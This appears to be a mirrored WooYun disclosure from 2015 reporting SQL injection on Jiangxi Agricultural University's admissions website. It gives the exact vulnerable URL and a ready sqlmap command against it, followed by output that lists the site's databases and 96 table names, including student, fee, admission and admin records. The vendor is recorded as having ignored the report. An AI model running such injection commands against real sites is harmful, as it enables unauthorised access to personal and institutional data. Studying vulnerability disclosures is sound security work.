乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-24: 厂商已经主动忽略漏洞,细节向公众公开
高校安全之江西农业大学SQL注射
sqlmap.py -u "http://zs.jxau.edu.cn/showpic.php?id=1" --dbs
available databases [2]:[*] information_schema[*] zs_jxauDatabase: zs_jxau[96 tables]+---------------------------+| admin_logs || admin_logs_failure || admin_menu_zs || admin_setting_zs || admin_usermenu_zs || bulletin_files_zs || bulletin_images_zs || bulletin_pdf || clickcount || code_bylbdm || code_dwlsbmdm || code_fee || code_jhxzdm || code_kldm || code_kslbdm || code_kslxdm || code_mz || code_sqdm || code_xlccdm || code_xzqh || code_zswyyzdm || code_zy || code_zy09 || code_zzmm || com_city || com_province || lib_ddzs_kc || lib_ddzs_km || major_fee || major_fee2 || message_receive || message_receive_zs || school_ad_zs || school_bulletin_news_pics || school_class || school_department || school_discuss_zs || school_flash_zs || school_info || school_links || school_linksdepartment || school_linksimage || school_linksoffice || school_linksother || school_lnlqcj || school_lqtzs_init || school_lqtzs_print || school_lqtzsems_init || school_lqtzsems_print || school_major || school_map || school_qqchat || school_rolemap || school_sushe || school_sushe_qs || school_upfiles_zs || school_user || school_zs_bkzn || school_zs_bxts || school_zs_lqxx || school_zs_qqchat || school_zs_splj || school_zs_tszy || school_zs_xsrxfc || school_zs_yb || school_zs_ys || school_zs_zsdt || school_zs_zsjh || school_zs_zszc || school_zs_zxgg || school_zs_zyjs || school_zsjh || school_zsjh_dx || school_zsjh_major || school_zsjh_sw || std_base || std_base_luqu || std_base_luqu_set || std_base_skkscj || std_base_skkscj_set || std_ddzs || std_ddzs_department || std_ddzs_kmkc || std_ddzs_major || std_ddzs_set || std_ddzs_zykm || std_fee2 || std_fee_ss || std_logfailure || std_logsuccess || std_netreg || std_netreg_set || stu_fee || sushe_area || temp_import_code || temp_import_stdcj |+---------------------------+
综上
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-09-24 23:04
暂无